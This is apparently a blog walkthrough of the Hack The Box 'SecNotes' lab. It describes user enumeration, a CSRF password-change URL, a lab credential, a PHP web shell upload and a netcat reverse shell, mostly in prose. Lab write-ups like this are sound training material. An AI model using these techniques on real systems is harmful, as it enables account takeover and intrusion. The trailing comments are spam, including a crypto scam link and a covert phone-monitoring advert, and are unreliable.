OSCP PREPROTİONS – HTB SecNotes

SecNotes machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, we detected 80/tcp http Microsoft IIS httpd 10.0, 445/tcp Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB), 8808/tcp ssports-bcast ports.
We provide enuemration via port 80

Here we get a login screen where we tried default paros, looked at the source code, looked at the webanalyzer and could not get any valuable information.
We scanned with Gobuster and did not find any noteworthy directories.

We create a user by clicking on the “Sign up now” button

We have created a user named Muhammed and we are logging in with this credential

The remarkable part here is the tyler@secnotes.htb mail part, where we both identify the domain and note that there may be a user named tyler.
Let’s test if this user exists or not.
This is how we get an error when there is an invalid user

This is how we get the error that we are getting a valid user.

Now let’s look at this for the tyler user

Here we understand that there is definitely tyler user, we try default passwords and we did not get any results. We tried a sql injection attack and we were not successful. We connect from the user we created and provide enumeration. Create New Note

Change Password

Here, there is a common problem with password change mechanisms, which is the inability to verify that the user knows the current password. Password recovery mechanisms also allow users to change their password without knowing the current password, but may require an additional verification step, such as sending the reset request to the email address associated with the username. If a malicious user gets the victim to click on a malicious password change request and the existing password does not need to be verified, they can take control of the account.
Here, let’s try to figure out how we can get the user to make a request
Contact Us;

Here, while sending a message to the user, let’s send it to see if it reacts and listen to it with nc.
We write our local ip address on the contact us side and listen with nc.

After sending, we saw that the request came with nc.

The request was made with windowspowershell.
Now here the tyler user is redirected on this form and can click on the link if a malicious password reset request is sent to this user. CSRF tokens would defend against this attack, but they are not implemented in the web application. In Burp, the ” “Change Password” request type is changed from POST to GET and the malicious URL is generated and forwarded.

We convert the port method to get method.

GET /change_pass.php?password=password1&confirm_password=password1&submit=submit HTTP/1.1

We detected that he saw a request here by sending a request to our own machine.
Can I log in immediately?
In user Tyler
tyler:password1
we were able to log in successfully with credential information

Here, when we look at the notes, we get credenial information.

tyler : 92g!mA8BGjOirkL%OG*&
credential information.
We provide smb enumereation using this information.

We have seen the new-site sharing area and we connect to it

Here is the iisstart.htm file, this is the default iss part, now we are looking for the 8808 port that we detected in this nmap.

It’s the same staradnrt login screen to an iis server, let’s test if we can upload files here
We upload a file named Test and see if it is created

Our test.txt file has been created and we are running its content, let’s create a shell oho here and let’s see if it will work.
We created our shell.php file and proceed to the machine

Now let’s go to this shell file

We have obtained a shell here.
This should give us a reveshell, so let’s pass nc to the target machine and then trigger nc from this command screen to get a revershell.

We obtained shell from user secnotes\tyler

Here we got the user flag but not the root flag

Therefore we provide local enumeratio.

We encountered bash in windows and it seemed interesting that bash.exe is running here, let’s see if we can get it to work for us

After typing bash, the root user is accessed but again we cannot access the administrator user

Here we see the /mnt directory
Let’s go here

Here we access the a linux file system
We go to the root directory and continue enumeration

Burada .bash_history dosyasında yönetici kullanıcısının şifresini alıyorum
Gidip smbclient ile bağlanalım.

Successfully connected
Here we get the rıt flagi

We have the root flag.
Here we could have obtained it using the psexec impacket tool.

Comments

  1. Aurielle

    Does your site have a contact page? I’m having trouble locating it but,
    I’d like to shoot you an e-mail. I’ve got some recommendations for
    your blog you might be interested in hearing.
    Either way, great blog and I look forward to seeing it
    develop over time.

  2. Adana

    I have been surfing on-line greater than three hours as of
    late, yet I by no means discovered any interesting article like yours.
    It is pretty price sufficient for me. Personally, if all
    webmasters and bloggers made excellent content material as
    you probably did, the internet shall be much more helpful than ever before.

  3. Sanaa

    Hi there! I know this is somewhat off-topic however I needed to ask.
    Does running a well-established website such as yours require a large amount of work?
    I am brand new to operating a blog but I do write in my journal daily.
    I’d like to start a blog so I can easily share my own experience and thoughts online.
    Please let me know if you have any kind of ideas or tips for new aspiring bloggers.
    Appreciate it!

  4. Lindie

    Excellent pieces. Keep posting such kind of information on your site.
    Im really impressed by your site.
    Hey there, You’ve performed a great job.
    I’ll definitely digg it and individually suggest to my friends.
    I’m sure they will be benefited from this web site.

  5. Colten

    Amazing things here. I’m very glad to look your article.
    Thank you so much and I am having a look ahead to contact you.
    Will you please drop me a e-mail?

  6. Rastrear Teléfono Celular

    A través del programa de monitoreo parental, los padres pueden prestar atención a las actividades del teléfono móvil de sus hijos y monitorear los mensajes de WhatsApp de manera más fácil y conveniente. El software de la aplicación se ejecuta silenciosamente en segundo plano en el dispositivo de destino, grabando mensajes de conversación, emoticonos, archivos multimedia, fotos y videos. Se aplica a todos los dispositivos que se ejecutan en sistemas Android e iOS.

  7. Scrapebox AA List

    Howdy! Do you know if they make any plugins to help with
    Search Engine Optimization? I’m trying to get my website
    to rank for some targeted keywords but I’m not seeing very
    good results. If you know of any please share.
    Appreciate it! I saw similar blog here: List of Backlinks

  8. MarioPub

    Bitcoin (BTC) might just be the golden opportunity of our era, poised to skyrocket to $200,000 in the upcoming year or the one following. In the past year alone, BTC has witnessed a staggering 20-fold increase, while other cryptocurrencies have surged by an astounding 800 times! Consider this: a mere few years ago, Bitcoin was valued at just $2. Now is the time to seize this unparalleled chance in life.
    Join Binance, the world’s largest and most secure digital currency exchange, and unlock free rewards. Don’t let this pivotal moment slip through your fingers!
    Click the link below to enjoy a lifetime 10% discount on all your trades.
    https://swiy.co/LgSv

  9. social media hacker app

    Today, I went to the beach with my children. I found a sea shell and gave it to my 4 year old daughter and said “You can hear the ocean if you put this to your ear.” She put the shell to her ear and screamed. There was a hermit crab inside and it pinched her ear. She never wants to go back! LoL I know this is completely off topic but I had to tell someone!

  10. Serolean reviews

    Good V I should definitely pronounce, impressed with your website. I had no trouble navigating through all the tabs and related info ended up being truly simple to do to access. I recently found what I hoped for before you know it in the least. Quite unusual. Is likely to appreciate it for those who add forums or anything, web site theme . a tones way for your customer to communicate. Nice task..

  11. Java Burn

    What i don’t realize is in truth how you are not really a lot more smartly-appreciated than you might be now. You are so intelligent. You already know thus considerably on the subject of this topic, produced me individually believe it from a lot of varied angles. Its like women and men are not fascinated until it is one thing to do with Woman gaga! Your individual stuffs nice. All the time care for it up!

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir